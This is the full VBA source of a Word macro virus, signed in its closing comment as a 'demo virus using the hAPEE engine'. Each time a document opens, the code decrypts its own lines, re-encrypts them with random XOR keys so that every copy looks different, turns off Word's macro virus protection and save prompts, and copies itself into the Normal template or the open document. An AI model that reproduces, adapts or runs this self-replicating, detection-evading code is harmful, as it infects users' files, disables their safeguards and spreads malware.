Private Sub Document_Open()
For A = 17 To 47
B = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(A, 1)
C = Asc(Chr("&H" & Mid(B, 2, 2)))
E = 2
For D = C + 2 To Len(B) Step 2
E = E + 2
F = F & Chr(Asc(Chr("&H" & Mid(B, D, 2))) Xor Asc(Chr("&H" & Mid(B, E, 2))))
If E = C Then E = 2
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine A, F
F = ""
Next
hAPEE
End Sub
Private Function hAPEE()
On Error Resume Next
For Lines2Encrypt = 17 To 47
Key = ""
For KeyLoop = 1 To Int(Rnd * 15) + 1
Key = Key & Chr(Int(Rnd * 254) + 1)
Next
Code = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Lines2Encrypt, 1)
Temp = ""
HexCode = ""
lenKey = 0
For EncryptLoop = 1 To Len(Code)
lenKey = lenKey + 1
Temp = Temp & Chr(Asc(Mid(Code, EncryptLoop, 1)) Xor Asc(Mid(Key, lenKey, 1)))
If lenKey = Len(Key) Then lenKey = 0
Next
EncryptCode = Chr((Len(Key) * 2) + 2) & Key & Temp
HexCode = ""
For Code2Hex = 1 To Len(EncryptCode)
TempHex = Hex(Asc(Mid(EncryptCode, Code2Hex, 1)))
If Len(TempHex) = 1 Then TempHex = "0" & TempHex
HexCode = HexCode & TempHex
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Lines2Encrypt, "'" & HexCode
Next
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: Options.ConfirmConversions = 0
TD = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines)
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
Target.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Target.VBProject.VBComponents(1).CodeModule.CountOfLines
Target.VBProject.VBComponents(1).CodeModule.AddFromString TD
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ThisDocument.Saved = True
End Function

'###########################################'
'# My_Name = hAPEE_Demo                    #'
'# My_Author = Lys_KovicK                  #'
'# My_Description = This is a demo virus   #'
'#                  using the hAPEE engine #'
'# My_Comments = Do Not Distribute!        #'
'###########################################'
